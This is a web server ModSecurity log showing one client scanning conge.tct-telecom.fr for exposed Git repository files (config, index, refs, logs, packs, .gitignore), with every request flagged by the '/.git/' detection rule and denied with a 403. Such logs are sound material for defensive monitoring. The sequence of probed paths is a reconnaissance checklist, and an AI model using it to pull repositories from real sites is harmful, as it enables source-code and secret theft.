[Mon May 11 20:55:47.958719 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImMzP5Q_-MBliRCAxm1wAAAAo"]
[Mon May 11 20:55:47.958949 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.old"] [unique_id "agImMzP5Q_-MBliRCAxm1wAAAAo"]
[Mon May 11 20:55:47.961660 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config~"] [unique_id "agImM5Yn-x0CHsbEbP2tDwAAAI8"]
[Mon May 11 20:55:47.961784 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects"] [unique_id "agImMyMeXtzav-mi9SyxJQAAAM4"]
[Mon May 11 20:55:47.961842 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config~"] [unique_id "agImM5Yn-x0CHsbEbP2tDwAAAI8"]
[Mon May 11 20:55:47.961927 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects"] [unique_id "agImMyMeXtzav-mi9SyxJQAAAM4"]
[Mon May 11 20:55:47.962050 2026] [security2:error] [pid 1502013:tid 1502042] [client 195.178.110.199:34342] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config~"] [unique_id "agImM5Yn-x0CHsbEbP2tDwAAAI8"]
[Mon May 11 20:55:47.962114 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects"] [unique_id "agImMyMeXtzav-mi9SyxJQAAAM4"]
[Mon May 11 20:55:47.977958 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/info"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/info"] [unique_id "agImMzP5Q_-MBliRCAxm2QAAAAo"]
[Mon May 11 20:55:47.978110 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/info"] [unique_id "agImMzP5Q_-MBliRCAxm2QAAAAo"]
[Mon May 11 20:55:47.978312 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/info"] [unique_id "agImMzP5Q_-MBliRCAxm2QAAAAo"]
[Mon May 11 20:55:47.980923 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/packed-refs"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/packed-refs"] [unique_id "agImMyMeXtzav-mi9SyxJgAAAM4"]
[Mon May 11 20:55:47.981083 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/packed-refs"] [unique_id "agImMyMeXtzav-mi9SyxJgAAAM4"]
[Mon May 11 20:55:47.981269 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/packed-refs"] [unique_id "agImMyMeXtzav-mi9SyxJgAAAM4"]
[Mon May 11 20:55:47.984417 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/index"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agImMzP5Q_-MBliRCAxm2gAAABM"]
[Mon May 11 20:55:47.984565 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agImMzP5Q_-MBliRCAxm2gAAABM"]
[Mon May 11 20:55:47.984747 2026] [security2:error] [pid 1501883:tid 1501904] [client 195.178.110.199:34272] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/index"] [unique_id "agImMzP5Q_-MBliRCAxm2gAAABM"]
[Mon May 11 20:55:47.987810 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agImM1NddpkriGUb6ZV2VAAAAQw"]
[Mon May 11 20:55:47.987978 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agImM1NddpkriGUb6ZV2VAAAAQw"]
[Mon May 11 20:55:47.988188 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/main"] [unique_id "agImM1NddpkriGUb6ZV2VAAAAQw"]
[Mon May 11 20:55:47.992029 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/info/exclude"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info/exclude"] [unique_id "agImMyMeXtzav-mi9SyxJwAAANA"]
[Mon May 11 20:55:47.992191 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info/exclude"] [unique_id "agImMyMeXtzav-mi9SyxJwAAANA"]
[Mon May 11 20:55:47.992379 2026] [security2:error] [pid 1516058:tid 1516106] [client 195.178.110.199:34214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/info/exclude"] [unique_id "agImMyMeXtzav-mi9SyxJwAAANA"]
[Mon May 11 20:55:47.997212 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agImM9eaRXe5lR8y0ZOSsAAAAUI"]
[Mon May 11 20:55:47.997366 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agImM9eaRXe5lR8y0ZOSsAAAAUI"]
[Mon May 11 20:55:47.997560 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/heads/master"] [unique_id "agImM9eaRXe5lR8y0ZOSsAAAAUI"]
[Mon May 11 20:55:48.033612 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/heads/master"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agImNFNddpkriGUb6ZV2VwAAARE"]
[Mon May 11 20:55:48.033761 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agImNFNddpkriGUb6ZV2VwAAARE"]
[Mon May 11 20:55:48.033940 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/heads/master"] [unique_id "agImNFNddpkriGUb6ZV2VwAAARE"]
[Mon May 11 20:55:48.062186 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/refs/remotes/origin/main"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agImNJYn-x0CHsbEbP2tEAAAAIQ"]
[Mon May 11 20:55:48.062453 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agImNJYn-x0CHsbEbP2tEAAAAIQ"]
[Mon May 11 20:55:48.062722 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/logs/refs/remotes/origin/main"] [unique_id "agImNJYn-x0CHsbEbP2tEAAAAIQ"]
[Mon May 11 20:55:48.170152 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/objects/pack"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/pack"] [unique_id "agImNFNddpkriGUb6ZV2WgAAARE"]
[Mon May 11 20:55:48.170350 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/pack"] [unique_id "agImNFNddpkriGUb6ZV2WgAAARE"]
[Mon May 11 20:55:48.170542 2026] [security2:error] [pid 1501831:tid 1501850] [client 195.178.110.199:34228] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/objects/pack"] [unique_id "agImNFNddpkriGUb6ZV2WgAAARE"]
[Mon May 11 20:55:48.187368 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/refs/remotes/origin/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agImNDP5Q_-MBliRCAxm2wAAAAo"]
[Mon May 11 20:55:48.187587 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agImNDP5Q_-MBliRCAxm2wAAAAo"]
[Mon May 11 20:55:48.187831 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/refs/remotes/origin/HEAD"] [unique_id "agImNDP5Q_-MBliRCAxm2wAAAAo"]
[Mon May 11 20:55:48.355596 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /.gitignore"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.gitignore"] [unique_id "agImNPjVc-A-CSptvm1xGAAAAEg"]
